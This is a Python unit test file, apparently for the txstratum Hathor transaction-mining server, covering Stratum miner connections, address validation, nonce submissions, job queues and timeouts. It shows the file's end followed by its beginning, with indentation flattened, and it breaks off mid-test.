'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_not_called()
transport.close.assert_not_called()
def _get_ready_miner(self, address: Optional[str] = None) -> StratumProtocol:
conn = StratumProtocol(self.manager)
conn._update_job_timestamp = False
transport = Mock()
conn.connection_made(transport=transport)
if address:
params = {'address': address}
else:
params = {}
conn.method_subscribe(params=params, msgid=None)
conn.method_authorize(params=None, msgid=None)
return conn
def test_miner_invalid_address(self):
conn = StratumProtocol(self.manager)
conn.send_error = MagicMock(return_value=None)
transport = Mock()
conn.connection_made(transport=transport)
params = {'address': 'X'}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_ADDRESS)
def test_miner_only_blocks_submit_failed_1(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params={}, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_2(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'abc!',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_3(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'ffff',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.JOB_NOT_FOUND)
def test_miner_only_blocks_submit_failed_4(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': 'FFZZ',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_5(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
def test_miner_only_blocks_submit(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Second submission: stale job
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn.current_job.height)
# conn.connection_lost(exc=None)
# self.loop.run_until_complete(self.manager.stop())
def test_miner_only_blocks_update_block(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# Hathor full node returned a new block template.
self.client.next_block_template()
self.loop.run_until_complete(self.manager.update_block_template())
self._run_all_pending_events()
self.assertEqual(1, conn.current_job.height)
def test_two_miners_same_submission_1(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
# First submission: success
params = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn1.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_called_once()
# As the main loop is not running, the jobs have not been updated yet.
# Second submission: success, but it won't be propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def test_two_miners_same_submission_2(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
params1 = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
params2 = {
'job_id': conn2.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
# First submission: success
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
conn1.method_submit(params=params1, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
# Run the main loop to update the jobs.
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn1.current_job.height)
self.assertEqual(1, conn2.current_job.height)
# As jobs have been updated, the submission from the second miner will be accepted but not propagated.
# Second submission: success and not propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params2, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def _run_basic_tx_tests(self, conn, tx_data, tx_nonce):
job = TxJob(tx_data)
ret = self.manager.add_job(job)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job)
self.assertTrue(ret)
# First submission: wrong nonce
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '84e20000',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
conn.send_result.assert_not_called()
self.assertFalse(conn.current_job.is_block)
# Second submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': tx_nonce,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Third submission: stale
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
def test_one_miner_one_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TX1_DATA, TX1_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_one_miner_two_txs(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
job1 = TxJob(TX1_DATA)
job2 = TxJob(TX2_DATA)
ret1 = self.manager.add_job(job1)
ret2 = self.manager.add_job(job2)
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job1)
self.assertTrue(ret1)
self.assertTrue(ret2)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': TX1_NONCE,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Run loop and check that the miner gets the next tx
self._run_all_pending_events()
self.assertFalse(conn.current_job.is_block)
self.assertEqual(conn.current_job.tx_job, job2)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': TX2_NONCE,
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_mining_tx_connection_lost(self):
conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn1.current_job)
self.assertTrue(conn1.current_job.is_block)
self.assertEqual(0, conn1.current_job.height)
conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn2.current_job)
self.assertTrue(conn2.current_job.is_block)
self.assertEqual(0, conn2.current_job.height)
job = TxJob(TX1_DATA)
ret = self.manager.add_job(job)
self.assertTrue(ret)
self.assertFalse(conn1.current_job.is_block)
self.assertEqual(conn1.current_job.tx_job, job)
self.assertEqual(conn2.current_job.tx_job, job)
# Miner 1 disconnects.
conn1.connection_lost(exc=None)
self.assertFalse(conn2.current_job.is_block)
self.assertEqual(conn2.current_job.tx_job, job)
# Miner 2 disconnects. Tx stays on the queue.
conn2.connection_lost(exc=None)
self.assertEqual(deque([job]), self.manager.tx_queue)
# Miner 3 connects. Tx is sent to the new miner.
conn3 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertFalse(conn3.current_job.is_block)
self.assertEqual(conn3.current_job.tx_job, job)
def test_token_creation_tx(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
self._run_basic_tx_tests(conn, TOKEN_CREATION_TX_DATA, TOKEN_CREATION_TX_NONCE)
# Run loop and check that the miner gets a block
self._run_all_pending_events()
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
def test_no_miners_at_start(self):
from txstratum.constants import DEFAULT_EXPECTED_MINING_TIME
expected_queue_time = 0
job1 = TxJob(TX1_DATA)
self.assertTrue(self.manager.add_job(job1))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job1.expected_mining_time)
self.assertEqual(0, job1.expected_queue_time)
self.assertEqual(1, len(self.manager.tx_queue))
if DEFAULT_EXPECTED_MINING_TIME > 0:
expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
job2 = TxJob(TX2_DATA)
self.assertTrue(self.manager.add_job(job2))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job2.expected_mining_time)
self.assertEqual(expected_queue_time, job2.expected_queue_time)
self.assertEqual(2, len(self.manager.tx_queue))
if DEFAULT_EXPECTED_MINING_TIME > 0:
expected_queue_time += DEFAULT_EXPECTED_MINING_TIME
job3 = TxJob(TOKEN_CREATION_TX_DATA)
self.assertTrue(self.manager.add_job(job3))
self.assertEqual(DEFAULT_EXPECTED_MINING_TIME, job3.expected_mining_time)
self.assertEqual(expected_queue_time, job3.expected_queue_time)
self.assertEqual(3, len(self.manager.tx_queue))
self.assertEqual([job1, job2, job3], list(self.manager.tx_queue))
# First miner connects and receives job1.
conn1 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn1.current_job)
self.assertEqual(job1, conn1.current_job.tx_job)
# Second miner connects and receives job1.
conn2 = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn2.current_job)
self.assertEqual(job1, conn2.current_job.tx_job)
class ManagerClockedTestCase(asynctest.ClockedTestCase): # type: ignore
def setUp(self):
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
from tests.utils import Clock
self.clock = Clock(self.loop)
self.clock.enable()
self.client = HathorClientTest(server_url='')
self.loop.run_until_complete(self.client.start())
self.manager = TxMiningManager(backend=self.client, address=address)
self.loop.run_until_complete(self.manager.start())
self.loop.run_until_complete(self.manager.wait_for_block_template())
self.assertTrue(len(self.manager.block_template) > 0)
def tearDown(self):
self.clock.disable()
async def test_block_timestamp_update(self):
job = self.manager.get_best_job(None)
self.assertTrue(True, job.is_block)
job.update_timestamp(force=True)
self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
# Update timestamp.
await self.advance(10)
job.update_timestamp()
self.assertEqual(int(txstratum.time.time()), job._block.timestamp)
# Do not update timestamp.
old_ts = txstratum.time.time()
await self.advance(40)
job.update_timestamp()
self.assertEqual(int(old_ts), job._block.timestamp)
async def test_tx_resubmit(self):
job1 = TxJob(TX1_DATA, timeout=10)
ret1 = self.manager.add_job(job1)
self.assertTrue(ret1)
# When a similar job is submitted, manager declines it.
job2 = TxJob(TX1_DATA)
ret2 = self.manager.add_job(job2)
self.assertFalse(ret2)
# Wait until job1 is marked as timeout.
await self.advance(15)
self.assertEqual(job1.status, JobStatus.TIMEOUT)
# Try to resubmit a similar job.
job3 = TxJob(TX1_DATA)
ret3 = self.manager.add_job(job3)
self.assertTrue(ret3)
async def test_tx_timeout_and_cleanup(self):
job1 = TxJob(TX1_DATA, timeout=10)
ret1 = self.manager.add_job(job1)
self.assertTrue(ret1)
self.assertIn(job1, self.manager.tx_queue)
self.assertIn(job1.uuid, self.manager.tx_jobs)
# Wait until job1 is marked as timeout.
await self.advance(15)
self.assertEqual(job1.status, JobStatus.TIMEOUT)
self.assertNotIn(job1, self.manager.tx_queue)
self.assertIn(job1.uuid, self.manager.tx_jobs)
# Wait until job1 is cleared.
await self.advance(self.manager.TX_CLEAN_UP_INTERVAL)
self.assertNotIn(job1, self.manager.tx_queue)
self.assertNotIn(job1.uuid, self.manager.tx_jobs)
async def test_tx_race_condition(self):
"""Test race condition caused when job2 replaces job1 and job1's clean up is close to be executed.
In this case job1's clean up was cleaning job2 instead.
"""
job1 = TxJob(TX1_DATA, timeout=10)
ret1 = self.manager.add_job(job1)
self.assertTrue(ret1)
# Wait until job1 is marked as timeout.
await self.advance(10)
self.assertEqual(job1.status, JobStatus.TIMEOUT)
self.assertNotIn(job1, self.manager.tx_queue)
self.assertIn(job1.uuid, self.manager.tx_jobs)
# We are 1 second away to cleanup the tx.
await self.advance(self.manager.TX_CLEAN_UP_INTERVAL - 1)
# Resubmit a similar job.
job2 = TxJob(TX1_DATA, timeout=10)
ret2 = self.manager.add_job(job2)
self.assertTrue(ret2)
self.assertIn(job2, self.manager.tx_queue)
self.assertIn(job2.uuid, self.manager.tx_jobs)
# Reach the cleanup time of job1.
await self.advance(2)
self.assertEqual(job2.status, JobStatus.ENQUEUED)
self.assertIn(job2, self.manager.tx_queue)
self.assertIn(job2.uuid, self.manager.tx_jobs)
# Job2 timeouts.
await self.advance(15)
self.assertEqual(job2.status, JobStatus.TIMEOUT) | tests/test_manager.py | import asyncio
import unittest
from collections import deque
from typing import List, Optional
from unittest.mock import ANY, MagicMock, Mock
import asynctest # type: ignore
from hathorlib.client import BlockTemplate, HathorClient
import txstratum.time
from txstratum.jobs import JobStatus, TxJob
from txstratum.manager import TxMiningManager
from txstratum.protocol import StratumProtocol
TX1_DATA = bytes.fromhex(
'0001000102000000000000089c0d40a9b1edfb499bc624833fde87ae459d495000393f4aaa00006'
'a473045022100c407d5e8f411f9ae582ebd7acbfcb6ea6170332709fb69acaa34c1b426f1d8f502'
'2003847963768eca9bcdf46e758319fb2699fd28ab657d00f54bef46c37a90405e2103755f2920f'
'f7dc32dc5414cea1cf9e078347f40894caf0c03637d083dbb261c5c000003e800001976a914a04c'
'9e2a0291f53c618fdad2ecb37748efb0eeeb88ac0000151800001976a914545f1156a3b00df622b'
'1d92968c21b962e9d7aa588ac4032a8228c4020c35ed18547020000000047c9881d2bf348d5ffd6'
'ce8398d6bc5d17b3bea75a53c15b7480be950000006ed5794bf69ebe7d7d75e7a0024d98acb85cb'
'9c101b59b8b6073e8667c84e2ee77'
)
TX1_NONCE = '84e2ee77'
TX2_DATA = bytes.fromhex(
'00010001020000000000000896f3792cf52e13978baa98ac966639946b558190f52d1d8c4900006a473045'
'022100cf557f80e59f4cc142dfeff28b54321c1787bc6faddb798093b9bd4e6fa32c60022055fbf4312f08'
'19748a6480e0d1f7d70276b3cc12276d973f991bdb2f22250b972103755f2920ff7dc32dc5414cea1cf9e0'
'78347f40894caf0c03637d083dbb261c5c0000170c00001976a914a04c9e2a0291f53c618fdad2ecb37748'
'efb0eeeb88ac000001f400001976a914a04c9e2a0291f53c618fdad2ecb37748efb0eeeb88ac4032a8228c'
'4020c35ed184d5020000006ed5794bf69ebe7d7d75e7a0024d98acb85cb9c101b59b8b6073e8667c000001'
'2a9d7b6a8895fc1fde992187e742eff81ad2e40994b595cc45056d7bb333cf514a'
)
TX2_NONCE = '33cf514a'
TOKEN_CREATION_TX_DATA = bytes.fromhex(
'00020104000005551d7740fd7d3c0acc50b5677fdd844f1225985aa431e1712af2a2fd'
'8900006a473045022100a445edb5cd6c79a0a7b5ed837582fd65b8d511ee60b64fd076'
'e07bd8f63f75a202202dca24320bffc4c3ca2a07cdfff38f7c839bde70ed49ef634ac6'
'588972836cab2103bfa995d676e3c0ed7b863c74cfef9683fab3163b42b6f21442326a'
'023fc57fba0000264800001976a9146876f9578221fdb678d4e8376503098a9228b132'
'88ac00004e2001001976a914031761ef85a24603203c97e75af355b83209f08f88ac00'
'00000181001976a9149f091256cb98649c7c35df0aad44d7805710691e88ac00000002'
'81001976a914b1d7a5ee505ad4d3b93ea1a5162ba83d5049ec4e88ac0109546f546865'
'4d6f6f6e04f09f9a804034a52aec6cece75e0fc0e30200001a72272f48339fcc5d5ec5'
'deaf197855964b0eb912e8c6eefe00928b6cf600001055641c20b71871ed2c5c7d4096'
'<KEY>'
)
TOKEN_CREATION_TX_NONCE = '01ff7369'
class HathorClientTest(HathorClient):
def __init__(self, server_url: str, api_version: str = '/v1a/'):
self._current_index = 0
BLOCK_DATA_1 = bytes.fromhex('000001ffffffe8b789180000001976a9147fd4ae0e4fb2d2854e76d359029d8078bb9'
'9649e88ac40350000000000005e0f84a9000000000000000000000000000000278a7e')
BLOCK_DATA_2 = bytes.fromhex('0000010000190000001976a9143d6dbcbf6e67b2cbcc3225994756a56a5e2d3a2788a'
'c40350000000000005e0f84de03000006cb93385b8b87a545a1cbb6197e6caff600c1'
'2cc12fc54250d39c8088fc0002d4d2a15def7604688e1878ab681142a7b155cbe52a6'
'b4e031250ae96db0a0002ad8d1519daaddc8e1a37b14aac0b045129c01832281fb1c0'
'2d873c7abbf9623731383164323332613136626139353030316465323264333135316'
'2303237652d3833623135646233343639373438626262396262393330363861383633'
'3634362d6365326637376239393130373434613162313665656666306630323161306'
'63200000002000000000000000080326758')
self._block_templates = [
BlockTemplate(data=BLOCK_DATA_1, height=0),
BlockTemplate(data=BLOCK_DATA_2, height=1),
]
def next_block_template(self) -> None:
self._current_index += 1
async def start(self):
pass
async def stop(self):
pass
async def get_block_template(self, address: Optional[str] = None) -> BlockTemplate:
return self._block_templates[self._current_index]
async def get_tx_parents(self) -> List[bytes]:
pass
async def push_tx_or_block(self, raw: bytes) -> bool:
self.next_block_template()
return True
class ManagerTestCase(unittest.TestCase):
def setUp(self):
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
self.client = HathorClientTest(server_url='')
self.loop.run_until_complete(self.client.start())
self.manager = TxMiningManager(backend=self.client, address=address)
self.loop.run_until_complete(self.manager.start())
self.loop.run_until_complete(self.manager.wait_for_block_template())
self.assertTrue(len(self.manager.block_template) > 0)
def _run_all_pending_events(self):
"""Run all pending events."""
# pending = asyncio.all_tasks(self.loop)
# self.loop.run_until_complete(asyncio.gather(*pending))
async def _fn():
pass
future = asyncio.ensure_future(_fn())
self.loop.run_until_complete(future)
def test_invalid_mining_address(self):
from hathorlib.exceptions import InvalidAddress
address = 'HC7w4j7mPet49BBN5a2An3XUiPvK6C1TL7'
invalid_addresses = [
('Invalid base58', address[:-1] + 'I'), # No 'I' in base58 symbols.
('Invalid checksum', address[:-1] + 'A'),
('Invalid size (smaller)', address[:-1]),
('Invalid size (bigger)', address + '7'),
]
for idx, (cause, invalid_address) in enumerate(invalid_addresses):
with self.assertRaises(InvalidAddress):
print('Address #{}: {} ({})'.format(idx, cause, invalid_address))
TxMiningManager(backend=self.client, address=invalid_address)
def test_miner_connect_disconnect(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_connect_ready_disconnect(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
self.assertEqual(1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(1, len(self.manager.miners))
conn.connection_lost(exc=None)
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_many_miners_connect_ready_disconnect(self, qty=5):
transport = Mock()
connections = []
for idx in range(qty):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=transport)
self.assertEqual(idx + 1, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
connections.append(conn)
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
for idx, conn in enumerate(connections):
conn.method_subscribe(params=None, msgid=None)
conn.method_authorize(params=None, msgid=None)
self.assertEqual(idx + 1, len(self.manager.miners))
self.assertEqual(qty, len(self.manager.connections))
self.assertEqual(qty, len(self.manager.miners))
self.manager.status()
for idx, conn in enumerate(connections):
conn.connection_lost(exc=None)
self.assertEqual(qty - idx - 1, len(self.manager.connections))
self.assertEqual(qty - idx - 1, len(self.manager.miners))
self.assertEqual(0, len(self.manager.connections))
self.assertEqual(0, len(self.manager.miners))
def test_miner_some_jsonrpc_methods(self):
conn = StratumProtocol(self.manager)
conn.connection_made(transport=None)
conn.send_result = MagicMock(return_value=None)
conn.method_extranonce_subscribe(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
conn.send_result = MagicMock(return_value=None)
conn.method_multi_version(params=None, msgid=None)
conn.send_result.assert_called_with(None, True)
def test_miner_method_subscribe_invalid_address1(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'abc!'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address2(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'ZiCa'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_invalid_address3(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHXXX'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once()
transport.close.assert_called_once()
def test_miner_method_subscribe_valid_address(self):
conn = StratumProtocol(self.manager)
transport = Mock()
conn.connection_made(transport=transport)
conn.send_error = MagicMock(return_value=None)
params = {
'address': 'HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ'
}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_not_called()
transport.close.assert_not_called()
def _get_ready_miner(self, address: Optional[str] = None) -> StratumProtocol:
conn = StratumProtocol(self.manager)
conn._update_job_timestamp = False
transport = Mock()
conn.connection_made(transport=transport)
if address:
params = {'address': address}
else:
params = {}
conn.method_subscribe(params=params, msgid=None)
conn.method_authorize(params=None, msgid=None)
return conn
def test_miner_invalid_address(self):
conn = StratumProtocol(self.manager)
conn.send_error = MagicMock(return_value=None)
transport = Mock()
conn.connection_made(transport=transport)
params = {'address': 'X'}
conn.method_subscribe(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_ADDRESS)
def test_miner_only_blocks_submit_failed_1(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params={}, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_2(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'abc!',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_3(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': 'ffff',
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.JOB_NOT_FOUND)
def test_miner_only_blocks_submit_failed_4(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': 'FFZZ',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_PARAMS, ANY)
def test_miner_only_blocks_submit_failed_5(self):
conn = self._get_ready_miner('HVZjvL1FJ23kH3buGNuttVRsRKq66WHUVZ')
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '123',
}
conn.send_error = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.INVALID_SOLUTION)
def test_miner_only_blocks_submit(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# First submission: success
params = {
'job_id': conn.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_not_called()
conn.send_result.assert_called_once_with(None, 'ok')
# Second submission: stale job
conn.send_error = MagicMock(return_value=None)
conn.send_result = MagicMock(return_value=None)
conn.method_submit(params=params, msgid=None)
conn.send_error.assert_called_once_with(None, conn.STALE_JOB, ANY)
conn.send_result.assert_not_called()
self._run_all_pending_events()
self.loop.run_until_complete(self.manager.update_block_template())
self.assertEqual(1, conn.current_job.height)
# conn.connection_lost(exc=None)
# self.loop.run_until_complete(self.manager.stop())
def test_miner_only_blocks_update_block(self):
conn = self._get_ready_miner()
self.assertIsNotNone(conn.current_job)
self.assertTrue(conn.current_job.is_block)
self.assertEqual(0, conn.current_job.height)
# Hathor full node returned a new block template.
self.client.next_block_template()
self.loop.run_until_complete(self.manager.update_block_template())
self._run_all_pending_events()
self.assertEqual(1, conn.current_job.height)
def test_two_miners_same_submission_1(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
self.assertEqual(0, conn2.current_job.height)
# First submission: success
params = {
'job_id': conn1.current_job.uuid.hex(),
'nonce': '00000000000000000000000000278a7e',
}
conn1.send_error = MagicMock(return_value=None)
conn1.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn1.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_called_once()
# As the main loop is not running, the jobs have not been updated yet.
# Second submission: success, but it won't be propagated.
conn2.send_error = MagicMock(return_value=None)
conn2.send_result = MagicMock(return_value=None)
self.manager.backend.push_tx_or_block = MagicMock(return_value=asyncio.Future())
conn2.method_submit(params=params, msgid=None)
conn1.send_error.assert_not_called()
conn1.send_result.assert_called_once_with(None, 'ok')
self.manager.backend.push_tx_or_block.assert_not_called()
def test_two_miners_same_submission_2(self):
conn1 = self._get_ready_miner()
conn2 = self._get_ready_miner()
self.assertEqual(0, conn1.current_job.height)
